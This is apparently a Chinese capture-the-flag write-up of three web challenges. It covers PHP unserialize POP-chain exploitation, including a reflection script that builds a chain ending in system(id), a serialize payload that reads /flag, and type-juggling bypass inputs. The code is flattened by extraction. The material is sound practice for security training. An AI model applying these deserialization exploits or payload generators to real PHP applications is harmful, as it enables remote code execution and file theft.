# 0x01 pop_master打开题目
1 2 3 4 5 6 7 8 <?php include "class.php" ;highlight_file(__FILE__ ); $a =$_GET ['pop' ];$b =$_GET ['argv' ];$class =unserialize($a );$class ->XXXXXX($b );
根据提示信息 下载源码
我滴个乖乖 2M 多的链 16 万行
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 class NXlGlW public $hGYbeeG ; public function HRD4CW ($y3Cae eval ($y3Cae ); } public function C3akk9 ($MSL6W eval ($MSL6W ); } } class qAARvi public $E0cUWyC ; public function GlSPMd ($XHiV9 $this ->BrLVt = "GAVzp" ; if (method_exists($this ->E0cUWyC, 'YAF1Wt' )) $this ->E0cUWyC->YAF1Wt($XHiV9 ); if (method_exists($this ->E0cUWyC, 'KfVcH5' )) $this ->E0cUWyC->KfVcH5($XHiV9 ); } public function olsElL ($t43I8 $this ->v35pY = "TNiWd" ; eval ($t43I8 ); } }
函数名 类名随机 生成 最总链成 用 eval 执行 system (“cat /flag”);
太菜了不会写脚本 用手工找几十个就行了,有大佬会写脚本的教教我
贴一个 大佬的脚本
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 <?php include_once "class.php" ;include_once "exp_1.php" ;$source = file_get_contents('class.php' );$fsource = preg_split('/' . PHP_EOL . '/' , $source );$evalfuncarr = [];$popchain = [];$i = [];function isfuncblacklist ($fname $blacklist = ['MISVgg' ]; foreach ($blacklist as $b ) { if ($b == $fname ) { return true ; } } return false ; } foreach ($arr as $a ) { $methods =get_class_methods($a ); foreach ($methods as $method ) { $func = new ReflectionMethod($a , $method ); if (isfuncblacklist($func ->name)) { continue ; } $f = $func ->getFileName(); $start_line = $func ->getStartLine() - 1 ; $end_line = $func ->getEndLine(); $length = $end_line - $start_line ; $body = implode(PHP_EOL, array_slice($fsource , $start_line , $length )); if (strstr($body , 'eval' )){ array_push($evalfuncarr , array ('class' =>$a , 'func' =>$method )); } } } function getcaller ($funcname global $arr , $fsource , $blacklist ; foreach ($arr as $a ) { $methods =get_class_methods($a ); foreach ($methods as $method ) { $func = new ReflectionMethod($a , $method ); if ($func ->name === $funcname ) { continue ; } if (isfuncblacklist($func ->name)) { continue ; } $f = $func ->getFileName(); $start_line = $func ->getStartLine() - 1 ; $end_line = $func ->getEndLine(); $length = $end_line - $start_line ; $body = implode(PHP_EOL, array_slice($fsource , $start_line , $length )); if (strstr($body , $funcname )){ return array ( 'class' => $a , 'func' => $method ); } } } return NULL ; } $finded = false ;foreach ($evalfuncarr as $a ) { if ($finded == true ){ break ; } $ret = $a ; $popchain = []; while (1 ) { $ret = getcaller($ret ['func' ]); if ($ret == NULL ) { array_pop($popchain ); break ; } array_push($popchain , $ret ); printf("\r[-] %s" , $ret ['func' ]); if ($ret ['func' ] == 'BrtDix' ) { printf("\n" ); var_dump($popchain ); foreach ($popchain as $p ) { printf("%s::%s -> " , get_class($p ['class' ]), $p ['func' ]); }; valid($a , $popchain ); break ; } } } function valid ($evalfunc , $chain $code = "<?php\n" ; $code .= "include_once 'class.php';" ; $code .= "\$e = new " .get_class($evalfunc ['class' ])."();\n" ; for ($i =0 ; $i < sizeof($chain ); $i ++) { $tmp = $chain [$i ]; $propname = array_keys(get_object_vars($tmp ['class' ]))[0 ]; $t = $i - 1 ; $code .= "\$a{$i} = new " .get_class($tmp ['class' ])."();\n" ; if ($i == 0 ) { $code .= "\$a{$i} ->{$propname} = \$e;\n" ; } else { $code .= "\$a{$i} ->{$propname} = \$a{$t} ;\n" ; } } $m = sizeof($chain )-1 ; $code .= "\$a{$m} ->BrtDix('system(id);// ');" ; echo $code ; echo "\n\n" ; file_put_contents("test_" .$evalfunc ['func' ].".php" , $code ); }
# 0x02 [强网先锋] 赌徒
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 <meta charset="utf-8" > <?php error_reporting(1 ); class Start public $name ='guest' ; public $flag ='syst3m("cat 127.0.0.1/etc/hint");' ; public function __construct ( echo "I think you need /etc/hint . Before this you need to see the source code" ; } public function _sayhello ( echo $this ->name; return 'ok' ; } public function __wakeup ( echo "hi" ; $this ->_sayhello(); } public function __get ($cc echo "give you flag : " .$this ->flag; return ; } } class Info private $phonenumber =123123 ; public $promise ='I do' ; public function __construct ( $this ->promise='I will not !!!!' ; return $this ->promise; } public function __toString ( return $this ->file['filename' ]->ffiillee['ffiilleennaammee' ]; } } class Room public $filename ='/flag' ; public $sth_to_set ; public $a ='' ; public function __get ($name $function = $this ->a; return $function (); } public function Get_hint ($file $hint =base64_encode(file_get_contents($file )); echo $hint ; return ; } public function __invoke ( $content = $this ->Get_hint($this ->filename); echo $content ; } } if (isset ($_GET ['hello' ])){ unserialize($_GET ['hello' ]); }else { $hi = new Start(); } ?> <meta charset="utf-8" > <?php error_reporting(1 ); class Start public $name ='guest' ; public $flag ='syst3m("cat 127.0.0.1/etc/hint");' ; public function __construct ( echo "I think you need /etc/hint . Before this you need to see the source code" ; } public function _sayhello ( echo $this ->name; return 'ok' ; } public function __wakeup ( echo "hi" ; $this ->_sayhello(); } public function __get ($cc echo "give you flag : " .$this ->flag; return ; } } class Info private $phonenumber =123123 ; public $promise ='I do' ; public function __construct ( $this ->promise='I will not !!!!' ; return $this ->promise; } public function __toString ( return $this ->file['filename' ]->ffiillee['ffiilleennaammee' ]; } } class Room public $filename ='/flag' ; public $sth_to_set ; public $a ='' ; public function __get ($name $function = $this ->a; return $function (); } public function Get_hint ($file $hint =base64_encode(file_get_contents($file )); echo $hint ; return ; } public function __invoke ( $content = $this ->Get_hint($this ->filename); echo $content ; } } if (isset ($_GET ['hello' ])){ unserialize($_GET ['hello' ]); }else { $hi = new Start(); } ?>
很明显反序列化 pop 链 最终执行 Get_hint file_get_contents 获得 flag
1 2 __invoke() //当尝试以调用函数的方式调用一个对象时,__invoke() 方法会被自动调用。 __get() //当我们试图获取一个不可达属性时(比如private),类会自动调用__get函数。
1 2 start=》wakeup=》sayhello =》Info=》toString=》this->room=》get =>room=》invoke
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 <?php class Start public $name ='guest' ; public $flag ='syst3m("cat 127.0.0.1/etc/hint");' ; } class info public $promise ; } class Room public $filename ='/flag' ; public $sth_to_set ; public $a ='' ; } $info = new info();$start = new start();$room = new Room();$start ->name = $info ;$start ->name->file['filename' ]=$room ;$room ->a = new room();echo serialize($start );
记得要把 开头的 hi 去掉在解码啊~
# 0x03 [强⽹先锋] 寻宝key1 常见绕过
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 <?php header('Content-type:text/html;charset=utf-8' ); highlight_file(__file__ ); function filter ($string $filter_word = array ('php' ,'flag' ,'index' ,'KeY1lhv' ,'source' ,'key' ,'eval' ,'echo' ,'\$' ,'\(' ,'\.' ,'num' ,'html' ,'\/' ,'\,' ,'\'' ,'0000000' ); $filter_phrase = '/' .implode('|' ,$filter_word ).'/' ; return preg_replace($filter_phrase ,'' ,$string ); } if ($ppp ){ unset ($ppp ); } $ppp ['number1' ] = "1" ;$ppp ['number2' ] = "1" ;$ppp ['nunber3' ] = "1" ;$ppp ['number4' ] = '1' ;$ppp ['number5' ] = '1' ;extract($_POST ); $num1 = filter($ppp ['number1' ]); $num2 = filter($ppp ['number2' ]); $num3 = filter($ppp ['number3' ]); $num4 = filter($ppp ['number4' ]);$num5 = filter($ppp ['number5' ]); if (isset ($num1 ) && is_numeric($num1 )){ die ("非数字" ); } else { if ($num1 > 1024 ){ echo "第一层" ; if (isset ($num2 ) && strlen($num2 ) <= 4 && intval($num2 + 1 ) > 500000 ){ echo "第二层" ; if (isset ($num3 ) && '4bf21cd' === substr(md5($num3 ),0 ,7 )){ echo "第三层" ; if (!($num4 < 0 )&&($num4 == 0 )&&($num4 <= 0 )&&(strlen($num4 ) > 6 )&&(strlen($num4 ) < 8 )&&isset ($num4 ) ){ echo "第四层" ; if (!isset ($num5 )||(strlen($num5 )==0 )) die ("no" ); $b =json_decode(@$num5 ); if ($y = $b === NULL ){ if ($y === true ){ echo "第五层" ; include 'KeY1lhv.php' ; echo $KEY1 ; } }else { die ("no" ); } }else { die ("no" ); } }else { die ("no" ); } }else { die ("no" ); } }else { die ("no111" ); } }
1 ppp[number1]=6666a&ppp[number2]=1e10&ppp[number3]=61823470&ppp[number4]=0abcdef&ppp[number5]=adada
第二个文件下载了,提示如下:
压缩包用可以分段下载器都可以下载
文件中有五个图片 干扰我好久
最终发现 key2 以明文形式存在 docx 中
key2
贴出寻找脚本
1 import osfrom docx import Documentpath = r"C:\Users\xxxxx\Desktop\five_month" str_to_search = "KEY2"
](https://img-blog.csdnimg.cn/20210615112844856.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM0MDk3NDk3,size_16,color_FFFFFF,t_70 )
wechat
alipay
